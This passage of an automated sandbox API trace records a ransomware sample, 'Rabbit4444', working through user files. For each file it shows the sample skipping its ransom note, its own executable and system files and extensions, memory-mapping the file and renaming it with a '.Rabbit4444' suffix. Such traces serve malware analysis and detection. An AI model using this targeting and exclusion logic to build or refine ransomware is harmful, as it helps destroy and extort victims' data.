| out: hHeap=0xe0000) returned 1 [0055.635] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0055.635] CloseHandle (hObject=0x298) returned 1 [0055.635] CloseHandle (hObject=0x278) returned 1 [0055.636] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\LPFVkW.rtf.Rabbit4444") returned 56 [0055.636] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\LPFVkW.rtf" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\lpfvkw.rtf"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\LPFVkW.rtf.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\lpfvkw.rtf.rabbit4444"), dwFlags=0x1) returned 1 [0055.636] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8976bf30, ftCreationTime.dwHighDateTime=0x1d4cdc1, ftLastAccessTime.dwLowDateTime=0x686a9840, ftLastAccessTime.dwHighDateTime=0x1d4d206, ftLastWriteTime.dwLowDateTime=0x686a9840, ftLastWriteTime.dwHighDateTime=0x1d4d206, nFileSizeHigh=0x0, nFileSizeLow=0x167fa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Mo4kmfIs.pptx", cAlternateFileName="MO4KMF~1.PPT")) returned 1 [0055.636] lstrcmpiW (lpString1="Mo4kmfIs.pptx", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.636] lstrcmpiW (lpString1="Mo4kmfIs.pptx", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.636] lstrcmpiW (lpString1="Mo4kmfIs.pptx", lpString2="Rabbit4444.exe") returned -1 [0055.637] lstrcmpiW (lpString1="Mo4kmfIs.pptx", lpString2=".") returned 1 [0055.637] lstrcmpiW (lpString1="Mo4kmfIs.pptx", lpString2="..") returned 1 [0055.637] lstrcmpiW (lpString1="Mo4kmfIs.pptx", lpString2="windows") returned -1 [0055.637] lstrcmpiW (lpString1="Mo4kmfIs.pptx", lpString2="bootmgr") returned 1 [0055.637] lstrcmpiW (lpString1="Mo4kmfIs.pptx", lpString2="pagefile.sys") returned -1 [0055.637] lstrcmpiW (lpString1="Mo4kmfIs.pptx", lpString2="boot") returned 1 [0055.637] lstrcmpiW (lpString1="Mo4kmfIs.pptx", lpString2="ids.txt") returned 1 [0055.637] lstrcmpiW (lpString1="Mo4kmfIs.pptx", lpString2="NTUSER.DAT") returned -1 [0055.637] lstrcpyW (in: lpString1=0x130eb7e, lpString2="Mo4kmfIs.pptx" | out: lpString1="Mo4kmfIs.pptx") returned="Mo4kmfIs.pptx" [0055.637] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Mo4kmfIs.pptx", dwFileAttributes=0x0) returned 1 [0055.637] lstrlenW (lpString="Mo4kmfIs.pptx") returned 13 [0055.637] lstrlenW (lpString="Rabbit4444") returned 10 [0055.637] lstrcmpiW (lpString1="kmfIs.pptx", lpString2="Rabbit4444") returned -1 [0055.637] lstrlenW (lpString=".dll") returned 4 [0055.637] lstrcmpiW (lpString1="pptx", lpString2=".dll") returned 1 [0055.637] lstrlenW (lpString=".lnk") returned 4 [0055.637] lstrcmpiW (lpString1="pptx", lpString2=".lnk") returned 1 [0055.637] lstrlenW (lpString=".ini") returned 4 [0055.637] lstrcmpiW (lpString1="pptx", lpString2=".ini") returned 1 [0055.637] lstrlenW (lpString=".sys") returned 4 [0055.637] lstrcmpiW (lpString1="pptx", lpString2=".sys") returned 1 [0055.637] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Mo4kmfIs.pptx" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\mo4kmfis.pptx"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0055.637] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0055.637] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14694819414) returned 1 [0055.637] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=92154) returned 1 [0055.638] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0055.638] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101958 [0055.638] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x16b00, lpName=0x0) returned 0x298 [0055.646] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16b00) returned 0x70000 [0055.648] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0055.648] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0055.648] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0055.648] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0055.648] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0055.649] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0055.649] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0055.649] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0055.649] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14695951001) returned 1 [0055.649] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0055.649] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101958 | out: hHeap=0xe0000) returned 1 [0055.649] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0055.650] CloseHandle (hObject=0x298) returned 1 [0055.650] CloseHandle (hObject=0x278) returned 1 [0055.650] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Mo4kmfIs.pptx.Rabbit4444") returned 59 [0055.650] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Mo4kmfIs.pptx" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\mo4kmfis.pptx"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Mo4kmfIs.pptx.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\mo4kmfis.pptx.rabbit4444"), dwFlags=0x1) returned 1 [0055.651] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6746790, ftCreationTime.dwHighDateTime=0x1d4c6af, ftLastAccessTime.dwLowDateTime=0xffa6c8d0, ftLastAccessTime.dwHighDateTime=0x1d4c718, ftLastWriteTime.dwLowDateTime=0xffa6c8d0, ftLastWriteTime.dwHighDateTime=0x1d4c718, nFileSizeHigh=0x0, nFileSizeLow=0x276c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="N99DG-cSyKfo.m4a", cAlternateFileName="N99DG-~1.M4A")) returned 1 [0055.651] lstrcmpiW (lpString1="N99DG-cSyKfo.m4a", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.651] lstrcmpiW (lpString1="N99DG-cSyKfo.m4a", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.651] lstrcmpiW (lpString1="N99DG-cSyKfo.m4a", lpString2="Rabbit4444.exe") returned -1 [0055.651] lstrcmpiW (lpString1="N99DG-cSyKfo.m4a", lpString2=".") returned 1 [0055.651] lstrcmpiW (lpString1="N99DG-cSyKfo.m4a", lpString2="..") returned 1 [0055.651] lstrcmpiW (lpString1="N99DG-cSyKfo.m4a", lpString2="windows") returned -1 [0055.651] lstrcmpiW (lpString1="N99DG-cSyKfo.m4a", lpString2="bootmgr") returned 1 [0055.651] lstrcmpiW (lpString1="N99DG-cSyKfo.m4a", lpString2="pagefile.sys") returned -1 [0055.651] lstrcmpiW (lpString1="N99DG-cSyKfo.m4a", lpString2="boot") returned 1 [0055.651] lstrcmpiW (lpString1="N99DG-cSyKfo.m4a", lpString2="ids.txt") returned 1 [0055.651] lstrcmpiW (lpString1="N99DG-cSyKfo.m4a", lpString2="NTUSER.DAT") returned -1 [0055.651] lstrcpyW (in: lpString1=0x130eb7e, lpString2="N99DG-cSyKfo.m4a" | out: lpString1="N99DG-cSyKfo.m4a") returned="N99DG-cSyKfo.m4a" [0055.651] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\N99DG-cSyKfo.m4a", dwFileAttributes=0x0) returned 1 [0055.651] lstrlenW (lpString="N99DG-cSyKfo.m4a") returned 16 [0055.652] lstrlenW (lpString="Rabbit4444") returned 10 [0055.652] lstrcmpiW (lpString1="cSyKfo.m4a", lpString2="Rabbit4444") returned -1 [0055.652] lstrlenW (lpString=".dll") returned 4 [0055.652] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0055.652] lstrlenW (lpString=".lnk") returned 4 [0055.652] lstrcmpiW (lpString1=".m4a", lpString2=".lnk") returned 1 [0055.652] lstrlenW (lpString=".ini") returned 4 [0055.652] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0055.652] lstrlenW (lpString=".sys") returned 4 [0055.652] lstrcmpiW (lpString1=".m4a", lpString2=".sys") returned -1 [0055.652] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\N99DG-cSyKfo.m4a" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\n99dg-csykfo.m4a"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0055.652] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0055.652] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14696274199) returned 1 [0055.652] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=10092) returned 1 [0055.652] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0055.652] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101738 [0055.652] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2a70, lpName=0x0) returned 0x298 [0055.652] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2a70) returned 0x70000 [0055.653] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0055.653] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0055.653] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0055.653] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0055.653] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0055.653] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0055.653] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0055.653] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0055.653] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14696402611) returned 1 [0055.653] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0055.653] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101738 | out: hHeap=0xe0000) returned 1 [0055.653] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0055.654] CloseHandle (hObject=0x298) returned 1 [0055.654] CloseHandle (hObject=0x278) returned 1 [0055.654] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\N99DG-cSyKfo.m4a.Rabbit4444") returned 62 [0055.654] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\N99DG-cSyKfo.m4a" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\n99dg-csykfo.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\N99DG-cSyKfo.m4a.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\n99dg-csykfo.m4a.rabbit4444"), dwFlags=0x1) returned 1 [0055.655] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcedd39b0, ftCreationTime.dwHighDateTime=0x1d4d248, ftLastAccessTime.dwLowDateTime=0x96798d10, ftLastAccessTime.dwHighDateTime=0x1d4c74b, ftLastWriteTime.dwLowDateTime=0x96798d10, ftLastWriteTime.dwHighDateTime=0x1d4c74b, nFileSizeHigh=0x0, nFileSizeLow=0x5cbd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NRJRu.jpg", cAlternateFileName="")) returned 1 [0055.655] lstrcmpiW (lpString1="NRJRu.jpg", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.655] lstrcmpiW (lpString1="NRJRu.jpg", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.655] lstrcmpiW (lpString1="NRJRu.jpg", lpString2="Rabbit4444.exe") returned -1 [0055.655] lstrcmpiW (lpString1="NRJRu.jpg", lpString2=".") returned 1 [0055.655] lstrcmpiW (lpString1="NRJRu.jpg", lpString2="..") returned 1 [0055.655] lstrcmpiW (lpString1="NRJRu.jpg", lpString2="windows") returned -1 [0055.655] lstrcmpiW (lpString1="NRJRu.jpg", lpString2="bootmgr") returned 1 [0055.655] lstrcmpiW (lpString1="NRJRu.jpg", lpString2="pagefile.sys") returned -1 [0055.655] lstrcmpiW (lpString1="NRJRu.jpg", lpString2="boot") returned 1 [0055.655] lstrcmpiW (lpString1="NRJRu.jpg", lpString2="ids.txt") returned 1 [0055.655] lstrcmpiW (lpString1="NRJRu.jpg", lpString2="NTUSER.DAT") returned -1 [0055.655] lstrcpyW (in: lpString1=0x130eb7e, lpString2="NRJRu.jpg" | out: lpString1="NRJRu.jpg") returned="NRJRu.jpg" [0055.655] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\NRJRu.jpg", dwFileAttributes=0x0) returned 1 [0055.655] lstrlenW (lpString="NRJRu.jpg") returned 9 [0055.655] lstrlenW (lpString="Rabbit4444") returned 10 [0055.655] lstrcmpiW (lpString1="", lpString2="Rabbit4444") returned -1 [0055.655] lstrlenW (lpString=".dll") returned 4 [0055.655] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0055.655] lstrlenW (lpString=".lnk") returned 4 [0055.655] lstrcmpiW (lpString1=".jpg", lpString2=".lnk") returned -1 [0055.655] lstrlenW (lpString=".ini") returned 4 [0055.655] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0055.655] lstrlenW (lpString=".sys") returned 4 [0055.656] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1 [0055.656] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\NRJRu.jpg" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\nrjru.jpg"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0055.656] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0055.656] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14696650632) returned 1 [0055.656] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=23741) returned 1 [0055.656] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0055.656] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0055.656] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5fc0, lpName=0x0) returned 0x298 [0055.656] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5fc0) returned 0x70000 [0055.657] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0055.657] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0055.657] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0055.657] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0055.657] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0055.657] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0055.657] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0055.657] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0055.657] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14696805260) returned 1 [0055.657] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0055.657] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0055.657] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0055.658] CloseHandle (hObject=0x298) returned 1 [0055.658] CloseHandle (hObject=0x278) returned 1 [0055.661] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\NRJRu.jpg.Rabbit4444") returned 55 [0055.661] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\NRJRu.jpg" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\nrjru.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\NRJRu.jpg.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\nrjru.jpg.rabbit4444"), dwFlags=0x1) returned 1 [0055.661] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6eec6100, ftCreationTime.dwHighDateTime=0x1d4d434, ftLastAccessTime.dwLowDateTime=0x729b4770, ftLastAccessTime.dwHighDateTime=0x1d4c92c, ftLastWriteTime.dwLowDateTime=0x729b4770, ftLastWriteTime.dwHighDateTime=0x1d4c92c, nFileSizeHigh=0x0, nFileSizeLow=0x485, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PhFbbnJJmisYmK.mp3", cAlternateFileName="PHFBBN~1.MP3")) returned 1 [0055.661] lstrcmpiW (lpString1="PhFbbnJJmisYmK.mp3", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.661] lstrcmpiW (lpString1="PhFbbnJJmisYmK.mp3", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.662] lstrcmpiW (lpString1="PhFbbnJJmisYmK.mp3", lpString2="Rabbit4444.exe") returned -1 [0055.662] lstrcmpiW (lpString1="PhFbbnJJmisYmK.mp3", lpString2=".") returned 1 [0055.662] lstrcmpiW (lpString1="PhFbbnJJmisYmK.mp3", lpString2="..") returned 1 [0055.662] lstrcmpiW (lpString1="PhFbbnJJmisYmK.mp3", lpString2="windows") returned -1 [0055.662] lstrcmpiW (lpString1="PhFbbnJJmisYmK.mp3", lpString2="bootmgr") returned 1 [0055.662] lstrcmpiW (lpString1="PhFbbnJJmisYmK.mp3", lpString2="pagefile.sys") returned 1 [0055.662] lstrcmpiW (lpString1="PhFbbnJJmisYmK.mp3", lpString2="boot") returned 1 [0055.662] lstrcmpiW (lpString1="PhFbbnJJmisYmK.mp3", lpString2="ids.txt") returned 1 [0055.662] lstrcmpiW (lpString1="PhFbbnJJmisYmK.mp3", lpString2="NTUSER.DAT") returned 1 [0055.662] lstrcpyW (in: lpString1=0x130eb7e, lpString2="PhFbbnJJmisYmK.mp3" | out: lpString1="PhFbbnJJmisYmK.mp3") returned="PhFbbnJJmisYmK.mp3" [0055.662] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\PhFbbnJJmisYmK.mp3", dwFileAttributes=0x0) returned 1 [0055.662] lstrlenW (lpString="PhFbbnJJmisYmK.mp3") returned 18 [0055.662] lstrlenW (lpString="Rabbit4444") returned 10 [0055.662] lstrcmpiW (lpString1="misYmK.mp3", lpString2="Rabbit4444") returned -1 [0055.662] lstrlenW (lpString=".dll") returned 4 [0055.662] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0055.662] lstrlenW (lpString=".lnk") returned 4 [0055.662] lstrcmpiW (lpString1=".mp3", lpString2=".lnk") returned 1 [0055.662] lstrlenW (lpString=".ini") returned 4 [0055.662] lstrcmpiW (lpString1=".mp3", lpString2=".ini") returned 1 [0055.662] lstrlenW (lpString=".sys") returned 4 [0055.662] lstrcmpiW (lpString1=".mp3", lpString2=".sys") returned -1 [0055.662] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\PhFbbnJJmisYmK.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\phfbbnjjmisymk.mp3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0055.663] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0055.663] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14697332520) returned 1 [0055.663] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1157) returned 1 [0055.663] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0055.663] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101628 [0055.663] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x790, lpName=0x0) returned 0x298 [0055.663] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x790) returned 0x70000 [0055.663] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0055.663] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0055.663] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0055.663] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0055.663] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0055.664] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0055.664] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0055.664] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0055.664] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14697438291) returned 1 [0055.664] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0055.664] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101628 | out: hHeap=0xe0000) returned 1 [0055.664] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0055.664] CloseHandle (hObject=0x298) returned 1 [0055.664] CloseHandle (hObject=0x278) returned 1 [0055.664] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\PhFbbnJJmisYmK.mp3.Rabbit4444") returned 64 [0055.664] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\PhFbbnJJmisYmK.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\phfbbnjjmisymk.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\PhFbbnJJmisYmK.mp3.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\phfbbnjjmisymk.mp3.rabbit4444"), dwFlags=0x1) returned 1 [0055.665] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50448500, ftCreationTime.dwHighDateTime=0x1d4d288, ftLastAccessTime.dwLowDateTime=0x8372f950, ftLastAccessTime.dwHighDateTime=0x1d4cb41, ftLastWriteTime.dwLowDateTime=0x8372f950, ftLastWriteTime.dwHighDateTime=0x1d4cb41, nFileSizeHigh=0x0, nFileSizeLow=0x9a28, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RnruXrOBs.pdf", cAlternateFileName="RNRUXR~1.PDF")) returned 1 [0055.665] lstrcmpiW (lpString1="RnruXrOBs.pdf", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.665] lstrcmpiW (lpString1="RnruXrOBs.pdf", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.665] lstrcmpiW (lpString1="RnruXrOBs.pdf", lpString2="Rabbit4444.exe") returned 1 [0055.665] lstrcmpiW (lpString1="RnruXrOBs.pdf", lpString2=".") returned 1 [0055.665] lstrcmpiW (lpString1="RnruXrOBs.pdf", lpString2="..") returned 1 [0055.665] lstrcmpiW (lpString1="RnruXrOBs.pdf", lpString2="windows") returned -1 [0055.665] lstrcmpiW (lpString1="RnruXrOBs.pdf", lpString2="bootmgr") returned 1 [0055.665] lstrcmpiW (lpString1="RnruXrOBs.pdf", lpString2="pagefile.sys") returned 1 [0055.665] lstrcmpiW (lpString1="RnruXrOBs.pdf", lpString2="boot") returned 1 [0055.665] lstrcmpiW (lpString1="RnruXrOBs.pdf", lpString2="ids.txt") returned 1 [0055.665] lstrcmpiW (lpString1="RnruXrOBs.pdf", lpString2="NTUSER.DAT") returned 1 [0055.665] lstrcpyW (in: lpString1=0x130eb7e, lpString2="RnruXrOBs.pdf" | out: lpString1="RnruXrOBs.pdf") returned="RnruXrOBs.pdf" [0055.665] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\RnruXrOBs.pdf", dwFileAttributes=0x0) returned 1 [0055.666] lstrlenW (lpString="RnruXrOBs.pdf") returned 13 [0055.666] lstrlenW (lpString="Rabbit4444") returned 10 [0055.666] lstrcmpiW (lpString1="uXrOBs.pdf", lpString2="Rabbit4444") returned 1 [0055.666] lstrlenW (lpString=".dll") returned 4 [0055.666] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0055.666] lstrlenW (lpString=".lnk") returned 4 [0055.666] lstrcmpiW (lpString1=".pdf", lpString2=".lnk") returned 1 [0055.666] lstrlenW (lpString=".ini") returned 4 [0055.666] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0055.666] lstrlenW (lpString=".sys") returned 4 [0055.666] lstrcmpiW (lpString1=".pdf", lpString2=".sys") returned -1 [0055.666] CreateFileW 